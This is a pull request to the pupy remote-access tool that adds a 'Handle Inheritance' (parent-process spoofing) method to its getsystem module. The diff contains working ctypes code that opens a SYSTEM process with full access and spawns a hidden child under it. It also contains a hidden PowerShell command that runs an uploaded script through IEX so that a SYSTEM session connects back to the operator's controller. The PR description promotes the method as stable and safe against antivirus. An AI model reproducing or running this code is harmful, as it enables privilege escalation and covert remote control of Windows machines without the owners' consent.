### PR TITLE
'Handle Inheritance' method implemented in getsystem

### DIFF
--- a/pupy/modules/getsystem.py
+++ b/pupy/modules/getsystem.py
@@ -18,27 +18,33 @@ class GetSystem(PupyModule):
     """
     Try to get NT AUTHORITY SYSTEM privileges
 
-    - Case 1: If the launcher on the target uses a reverse connection (e.g. connect or auto_proxy), this module will migrate on a created System process by default.
-    In this case, the created System launcher will connect to your pupy contoller automatically.
+    - Case 1: If the launcher on the target uses a reverse connection (e.g. connect or auto_proxy), 
+    this module will migrate on a created SYSTEM process ('impersonate' method) or 
+    it will create a new SYSTEM process thanks to a handle inheritance ('inheritance' method) aka 'parent method'.
+    In this case, the created SYSTEM launcher will connect to your pupy contoller automatically.
     - Case 2: If the launcher on the target uses a bind connection, this module will enable the 'powershell' option by default.
-    In this case, a ps1 script will be uploaded and it will be executed as System on the target (without migration by default).
+    In this case, a ps1 script will be uploaded and it will be executed as System on the target.
     This ps1 script listens on your given port on the target. You have to connect to this launcher manually.
     """
 
-    dependencies=["pupwinutils.security"]
+    dependencies=["pupwinutils.security", "pupwinutils.processes"]
 
     @classmethod
     def init_argparse(cls):
         cls.arg_parser = PupyArgumentParser(prog="getsystem", description=cls.__doc__)
-        cls.arg_parser.add_argument("--prog", default="cmd.exe", help="Change the default process to create/inject into")
-        cls.arg_parser.add_argument('-m', dest='migrate', action='store_true', default=True, help="Used by default: migrate to the system process (could be detected by AV)")
-        cls.arg_parser.add_argument('-r', dest='restart', action='store_true', default=False, help="Restart current executable as admin")
-        cls.arg_parser.add_argument('-p', dest='powershell', action='store_true', default=False, help="Use powershell to automatically get a reverse shell")
-        cls.arg_parser.add_argument('-k', dest='keep', action='store_true', default=False, help="Keep this current connection after migration (default: %(default)s)")
-        cls.arg_parser.add_argument('-t', dest='timeout', default=60, type=int, help="Wait n seconds a reverse connection during migration (default: %(default)s)")
+        cls.arg_parser.add_argument('-m', dest='method', choices=["impersonate", "inheritance"], default=None, help="Method for gaining a new pupy session as SYSTEM")
+        cls.arg_parser.add_argument("--prog", default="cmd.exe", help="Change the default process to create/inject into ('impersonate' method only)")
+        cls.arg_parser.add_argument('-r', dest='restart', action='store_true', default=False, help="Relaunch current executable as system")
+        cls.arg_parser.add_argument('-p', dest='powershell', action='store_true', default=False, help="Force to use a powershell payload")
+        cls.arg_parser.add_argument('--ppid', dest='parentID', type=int, default=None, help="Force this ppid ('inheritance' method only)")
+        cls.arg_parser.add_argument('-k', dest='keep', action='store_false', default=True, help="Close this current connection after migration ('impersonate' method only)")
+        cls.arg_parser.add_argument('-t', dest='timeout', default=60, type=int, help="Wait n seconds a reverse connection during migration (default: %(default)s) ('impersonate' method only)")
 
     def run(self, args):
 
+        #Command to execute on the target
+        cmdToExecute = None
+        #The the local file which contains PS1 script (when powershell chosen or enabled automcatically)
         local_file  = ''
         #True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
         isBindLauncherForPs1 = False
@@ -46,29 +52,24 @@ class GetSystem(PupyModule):
         listeningAddressPortForBindPs1 = None
         #Usefull information for bind mode connection (ps1 script)
         launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
+        
+        if args.method == None:
+            self.error('You have to choose a method for gaining a new pupy session as NT AUTHORITY\SYSTEM')
+            return False
+            
         #Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
         if launcherType == "bind":
             self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort))
             isBindLauncherForPs1 = True
-            self.info('Consequently, powershell option is enabled')
+            self.info('Consequently, powershell option is enabled automatically')
             args.powershell = True
         else:
             self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)')
             isBindLauncherForPs1 = False
-
-        # restart current exe as system
-        if args.restart:
-            self.info('Using current executable')
-            exe = self.client.desc['exec_path'].split('\\')
-            if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows':
-                self.warning('It seems that your current process is %s' % self.client.desc['exec_path'])
-                self.warning('It is not recommended to restart it')
-                return
-
-            cmd = self.client.desc['exec_path']
-
-        # use powerhell to get a reverse shell
-        elif args.powershell or isBindLauncherForPs1:
+        
+        #A Powershell payload is used for getting a pupy session as SYSTEM
+        if args.powershell:
+            self.info('A powershell payload will be used for getting a pupy session as SYSTEM')
             clientConfToUse = None
             ros         = self.client.conn.modules['os']
             rtempfile   = self.client.conn.modules['tempfile']
@@ -88,7 +89,7 @@ class GetSystem(PupyModule):
                         self.warning("You have to give me a valid port. Try again. ({})".format(e))
                 listeningAddress = addressPort.split(':')[0]
                 listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort)
-                self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1))
+                self.info("The ps1 script used for getting a pupy session as SYSTEM will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1))
                 bindConf = self.client.get_conf()
                 #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
                 bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort)
@@ -96,6 +97,7 @@ class GetSystem(PupyModule):
             else:
                 self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection')
                 clientConfToUse = self.client.get_conf()
+            self.info("Generating the PS1 script locally...")
             if '64' in  self.client.desc['proc_arch']:
                 local_file = pupygen.generate_ps1(self.log, clientConfToUse, x64=True)
             else:
@@ -105,29 +107,68 @@ class GetSystem(PupyModule):
             random_name += '.txt'
             remotefile  = ros.path.join(tempdir, random_name)
 
-            cmd     = ur'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
+            cmd     = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
             param   = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile
 
-            cmd = '%s %s' % (cmd, param)
+            cmdToExecute = '%s %s' % (cmd, param)
 
             self.info("Uploading file in %s" % remotefile)
             upload(self.client.conn, local_file, remotefile)
+        
+        # restart current exe as system
+        if args.restart:
+            self.info('Trying to configure for running the current executable on the target as SYSTEM')
+            exe = self.client.desc['exec_path'].split('\\')
+            if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows':
+                self.warning('It seems that your current process is %s' % self.client.desc['exec_path'])
+                self.warning('It is not recommended to restart it')
+                return
+            cmdToExecute = self.client.desc['exec_path']
+            
+        if args.method == 'inheritance':
+            self.info("Method 'Handle Inheritance' (Parent Method) chosen")
+            if cmdToExecute == None:
+                self.error("Impossible to know the command to execute on the target as SYSTEM. You should try -p (powershell) or -r (relaunch exe) option.")
+                return
+            
+            if args.parentID:
+                self.info('Using the Parent Process method on the pid {0}...'.format(args.parentID))
+                with redirected_stdo(self):
+                    status = self.client.conn.modules["pupwinutils.security"].createnewprocessfrom(ppid=args.parentID, cmd=cmdToExecute)
+                if status == False:
+                    self.error("Impossible to execute a new process as SYSTEM on the target")
+                else:
+                    self.success("A new process has been executed as SYSTEM on the target")         
+            else:    
+                self.info("Getting information about all processes running on the target")
+                processes = self.client.conn.modules["pupwinutils.processes"].enum_processes()
+                self.info("Searching a process with a 'SYSTEM' integrity level")
+                for aprocess in processes:
+                    integrityLevel = self.client.conn.modules["pupwinutils.security"].get_integrity_level(pid=aprocess['pid'])
+                    if isinstance(integrityLevel, int):
+                        pass
+                    elif integrityLevel == "System":
+                        self.info("{0} (pid {1}) has a 'SYSTEM' integrity level, trying to use it".format(aprocess['name'],aprocess['pid']))
+                        with redirected_stdo(self):
+                            status = self.client.conn.modules["pupwinutils.security"].createnewprocessfrom(ppid=aprocess['pid'], cmd=cmdToExecute)
+                        if status == False:
+                            self.warning("Impossible to execute a new process as SYSTEM on the target with the ppid {0}.".format(aprocess['pid']))
+                        else:
+                            self.success("A new process has been executed as SYSTEM on the target thanks to the ppid {0}".format(aprocess['pid']))
+                            break 
 
-        # migrate
-        else:
-            cmd     = args.prog
-
-        with redirected_stdo(self):
-            proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd)
-
-        if args.migrate and not args.restart and not args.powershell:
-            migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
-            self.success("got system !")
-        else:
+        elif args.method == 'impersonate':
+            self.info("Method 'Impersonate' chosen")  
+            if cmdToExecute == None:
+                cmdToExecute = args.prog
+            with redirected_stdo(self):
+                proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmdToExecute)
+                migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
+                self.success("got system !")
+        
+        if args.powershell:
             if isBindLauncherForPs1:
                 self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1))
             else:
                 self.success("Waiting for a connection (take few seconds, 1 min max)...")
-
-        if args.powershell:
             os.remove(local_file)

--- a/pupy/packages/windows/all/pupwinutils/security.py
+++ b/pupy/packages/windows/all/pupwinutils/security.py
@@ -7,17 +7,21 @@ from ctypes import (
     c_wchar_p, c_long, c_uint16, Structure, Union,
     POINTER, create_unicode_buffer, create_string_buffer,
     get_last_error, cast, c_void_p, sizeof, c_int, c_ulong,
-    c_wchar, GetLastError, WinError, byref, addressof
+    c_wchar, GetLastError, WinError, byref, addressof, c_size_t,
+    c_ushort, FormatError, create_string_buffer, create_unicode_buffer,
+    c_ubyte, resize
 )
 
 from ctypes.wintypes import (
-    BOOL, LPSTR, BYTE
+    BOOL, LPSTR, BYTE, LPCSTR
 )
 
 import subprocess
 import psutil
 import sys
 import os
+
+import logging
 
 from os import W_OK, X_OK, R_OK
 
@@ -38,6 +42,10 @@ HANDLE                          = LPVOID
 INVALID_HANDLE_VALUE            = c_void_p(-1).value
 LONG                            = c_long
 WORD                            = c_uint16
+PULONG                          = c_void_p
+LPBYTE                          = c_char_p
+SIZE_T                          = c_size_t
+ULONG                           = c_ulong
 
 INVALID_HANDLE_VALUE = c_void_p(-1).value
 SECURITY_INFORMATION = DWORD
@@ -192,6 +200,21 @@ SecurityAnonymous = 0
 SecurityIdentification = 1
 SecurityImpersonation = 2
 SecurityDelegation = 3
+
+SYSTEM_EXTENDED_HANDLE_INFORMATION = 0x00000040
+FILE_DEVICE_UNKNOWN = 0x00000022
+FILE_ANY_ACCESS = 0x00000000
+METHOD_NEITHER = 0x00000003
+PROCESS_ALL_ACCESS = 0x001F0FFF
+PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000
+EXTENDED_STARTUPINFO_PRESENT = 0x00080000
+CREATE_NEW_CONSOLE = 0x00000010
+CREATE_NO_WINDOW = 0x08000000
+DETACHED_PROCESS = 0x00000008
+CREATE_UNICODE_ENVIRONMENT = 0x00000400
+ENTRIES = 0x00006000
+DWORD_PTR = DWORD
+USHORT = c_ushort
 
 class TOKEN_INFORMATION_CLASS:
     #see http://msdn.microsoft.com/en-us/library/aa379626%28VS.85%29.aspx
@@ -369,6 +392,63 @@ class PRIVILEGE_SET_HEADER(Structure):
         ('PrivilegeCount', DWORD),
         ('Control', DWORD)
     ]
+
+class PROC_THREAD_ATTRIBUTE_ENTRY(Structure):
+    _fields_ = [
+               ("Attribute",     DWORD),
+               ("cbSize",       SIZE_T),
+               ("lpValue",       PVOID)
+]
+
+class PROC_THREAD_ATTRIBUTE_LIST(Structure):
+    _fields_ = [
+               ("dwFlags", DWORD),
+               ("Size",    ULONG),
+               ("Count",   ULONG),
+               ("Reserved",ULONG),
+               ("Unknown", PULONG),
+               ("Entries", PROC_THREAD_ATTRIBUTE_ENTRY * 1)
+]
+
+class _STARTUPINFOA(Structure):
+        _fields_ = [
+        ("cb", DWORD),
+        ("lpReserved", LPSTR),
+        ("lpDesktop", LPSTR),
+        ("lpTitle", LPSTR),
+        ("dwX", DWORD),
+        ("dwY", DWORD),
+        ("dwXSize", DWORD),
+        ("dwYSize", DWORD),
+        ("dwXCountChars", DWORD),
+        ("dwYCountChars", DWORD),
+        ("dwFillAttribute", DWORD),
+        ("dwFlags", DWORD),
+        ("wShowWindow", WORD),
+        ("cbReserved2", WORD),
+        ("lpReserved2", LPBYTE),
+        ("hStdInput", HANDLE),
+        ("hStdOutput", HANDLE),
+        ("hStdError", HANDLE),
+    ]
+
+class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
+    _fields_ = [("Object", PVOID),
+                ("UniqueProcessId", PVOID),
+                ("HandleValue", PVOID),
+                ("GrantedAccess", ULONG),
+                ("CreatorBackTraceIndex", USHORT),
+                ("ObjectTypeIndex", USHORT),
+                ("HandleAttributes", ULONG),
+                ("Reserved", ULONG)]
+
+class STARTUPINFOEX(Structure):
+    _fields_ = [("StartupInfo", STARTUPINFO),
+                ("lpAttributeList", PVOID)]
+
+class TOKEN_MANDATORY_LABEL(Structure):
+    _fields_ = [
+            ('Label', SID_AND_ATTRIBUTES),]
 
 # advapi32
 
@@ -657,6 +737,23 @@ AccessCheck.restype                 = BOOL
 AccessCheck.argtypes                = [c_void_p, HANDLE, DWORD, POINTER(GENERIC_MAPPING),
                                        c_void_p, POINTER(DWORD), POINTER(DWORD), POINTER(BOOL)]
 
+
+GetSidSubAuthorityCount             = advapi32.GetSidSubAuthorityCount
+GetSidSubAuthorityCount.argtypes    = [c_void_p]
+GetSidSubAuthorityCount.restype     = POINTER(c_ubyte)
+
+GetSidSubAuthority                  = advapi32.GetSidSubAuthority
+GetSidSubAuthority.argtypes         = [c_void_p, DWORD]
+GetSidSubAuthority.restype          = POINTER(DWORD)
+
+CreateProcessW                       = kernel32.CreateProcessW #Unicode version
+CreateProcessW.restype               = BOOL
+CreateProcessW.argtypes              = [LPCSTR, LPSTR, PSECURITY_ATTRIBUTES, PSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)]
+
+CreateProcessA                       = kernel32.CreateProcessA #Unicode version
+CreateProcessA.restype               = BOOL
+CreateProcessA.argtypes              = [LPCSTR, LPSTR, PSECURITY_ATTRIBUTES, PSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, POINTER(STARTUPINFOEX), POINTER(PROCESS_INFORMATION)]
+
 # kernel32
 
 GetFileAttributesW                  = kernel32.GetFileAttributesW
@@ -690,6 +787,14 @@ LocalAlloc.argtypes                 = [PSID, DWORD]
 LocalFree                           = kernel32.LocalFree
 LocalFree.restype                   = HANDLE
 LocalFree.argtypes                  = [HANDLE]
+
+InitializeProcThreadAttributeList          = kernel32.InitializeProcThreadAttributeList
+InitializeProcThreadAttributeList.restype  = BOOL
+InitializeProcThreadAttributeList.argtypes = [POINTER(PROC_THREAD_ATTRIBUTE_LIST), DWORD, DWORD, POINTER(SIZE_T)]
+
+UpdateProcThreadAttribute                  = kernel32.UpdateProcThreadAttribute
+UpdateProcThreadAttribute.restype          = BOOL
+UpdateProcThreadAttribute.argtypes         = [POINTER(PROC_THREAD_ATTRIBUTE_LIST), DWORD, DWORD_PTR, PVOID, SIZE_T, PVOID, POINTER(SIZE_T)]
 
 # ntdll
 RtlGetVersion                       = ntdll.RtlGetVersion
@@ -1495,3 +1600,135 @@ def getfileowneracls(path):
 
     infos.append(ACLs)
     return infos
+
+def createnewprocessfrom(ppid, cmd):
+    """
+    Create new process as SYSTEM via Handle Inheritance specifying privileged parent
+    Returns True if no problem
+    Based on : https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1
+    """
+    lpAttributeList = None
+    dwAttributeCount = 1
+    dwFlags = 0
+    lpSize = c_size_t(0)
+    
+    if not IsUserAnAdmin():
+        raise OSError("You need admin rights to run getsystem !")
+
+    # 1.Call with null lpAttributeList first to get back the lpSize
+    InitializeProcThreadAttributeList(None, 1, 0, byref(lpSize))
+    
+    # 2.Initialize the attribute list
+    lpAttributeList = PROC_THREAD_ATTRIBUTE_LIST()
+    goodInit = InitializeProcThreadAttributeList(lpAttributeList, 1, 0, byref(lpSize))
+    if not goodInit:
+        return 1
+    
+    # 3.Add attribute to attribute list (we now know buffer size for the specified number of attributes we allocate and initialize AttributeList)
+    #lpValue = PVOID(ppid) # Handle to specified parent
+    handle = OpenProcess(PROCESS_ALL_ACCESS, False, int(ppid))
+    if handle == 0:
+        raise WinError(get_last_error())
+    lpValue = PVOID(handle)
+    goodUpdate = UpdateProcThreadAttribute(lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, byref(lpValue), sizeof(lpValue), None, None)
+    if not goodUpdate:
+        return 2
+
+    #gaining a shell...
+    lpProcessInformation = PROCESS_INFORMATION()
+    
+    lpStartupInfo              = STARTUPINFOEX()
+    lpStartupInfo.StartupInfo.lpReserved   = 0
+    lpStartupInfo.StartupInfo.lpDesktop    = 0
+    lpStartupInfo.StartupInfo.lpTitle      = 0
+    lpStartupInfo.StartupInfo.dwFlags      = 0
+    lpStartupInfo.StartupInfo.cbReserved2  = 0
+    lpStartupInfo.StartupInfo.lpReserved2  = 0
+    lpStartupInfo.StartupInfo.cb = sizeof(lpStartupInfo)
+    lpStartupInfo.lpAttributeList = addressof(lpAttributeList)
+    
+    lpProcessInformation              = PROCESS_INFORMATION()
+    lpProcessInformation.hProcess     = INVALID_HANDLE_VALUE
+    lpProcessInformation.hThread      = INVALID_HANDLE_VALUE
+    lpProcessInformation.dwProcessId  = 0
+    lpProcessInformation.dwThreadId   = 0
+
+    dwCreationFlags = (CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT)
+
+    cmd = create_string_buffer(cmd)
+    success = CreateProcessA(None, cmd, None, None, 0, dwCreationFlags, None, None,  byref(lpStartupInfo), byref(lpProcessInformation))
+    if not success:
+        raise WinError(get_last_error())
+    return True
+
+def get_integrity_level(pid):
+    '''
+    Returns the integrity level of a specific pid
+    Notice the process running this method should have less or same 'pivileges' than the pid for getting the integrity level.
+    e.g. a process running with medium integrity level can't access to integrity level information of a process running with the system or high integrity level.
+    You can test with Process Explorer.
+    Returns 0, 1, 2, 3 ,4, 5 or 6 if an error. Otherwise returns string (intergrity level)
+    '''
+
+    mapping = {
+        0x0000: u'Untrusted',
+        0x1000: u'Low',
+        0x2000: u'Medium',
+        0x2100: u'Medium high',
+        0x3000: u'High',
+        0x4000: u'System',
+        0x5000: u'Protected process',
+    }
+
+    #TOKEN_READ = DWORD(0x20008)
+    TokenIntegrityLevel = c_uint32(25)
+    token = c_void_p()
+        
+    proc_handle = OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pid))
+    if proc_handle == 0:
+        return 0
+        
+    if not OpenProcessToken(
+            proc_handle,
+            TOKEN_READ,
+            byref(token)):
+        logging.error('Failed to get process token')
+        return 1
+
+    if token.value == 0:
+        logging.error('Got a NULL token')
+        return 2
+    try:
+        info_size = DWORD()
+        if GetTokenInformation(
+                token,
+                TokenIntegrityLevel,
+                c_void_p(),
+                info_size,
+                byref(info_size)):
+            logging.error('GetTokenInformation() failed expectation')
+            return 3
+            
+        if info_size.value == 0:
+            logging.error('GetTokenInformation() returned size 0')
+            return 4
+
+        token_info = TOKEN_MANDATORY_LABEL()
+        resize(token_info, info_size.value)
+        if not GetTokenInformation(
+                token,
+                TokenIntegrityLevel,
+                byref(token_info),
+                info_size,
+                byref(info_size)):
+            logging.error(
+                    'GetTokenInformation(): Unknown error with buffer size %d: %d', info_size.value, GetLastError())
+            return 6
+
+        p_sid_size = GetSidSubAuthorityCount(token_info.Label.Sid)
+        res = GetSidSubAuthority(token_info.Label.Sid, p_sid_size.contents.value - 1)
+        value = res.contents.value
+        return mapping.get(value) or u'0x%04x' % value
+
+    finally:
+        CloseHandle(token)


### PR DESCRIPTION
Hello,

I have not searched a fix for the bug in the _getsystem_ module yet ([https://github.com/n1nj4sec/pupy/issues/704](https://github.com/n1nj4sec/pupy/issues/704)).

There is 'often' bugs in the _getsystem_ module with the _impersonation_ method...

That is why I have implemented a more **stable**, **simple** and 'safe' (against AV) method for becoming SYSTEM when you have admin rights on a Windows computer: "**Handle Inheritance**" (or "**Parent Process**" method). Some details here [https://movaxbx.ru/category/security/page/2/](https://movaxbx.ru/category/security/page/2/)

I think this method has been discovered by James Forshaw.

I have tested this 'Inheritance' method on wind10 x64 arch, from a x86 and x64 process. All works well.
I have not modified the source code of the "impersonation" method.

Now the user has to choose between the '_impersonation_' method (with a migration) or the '_Inheritance_' method in the _getsystem_ module when he would like to become SYSTEM.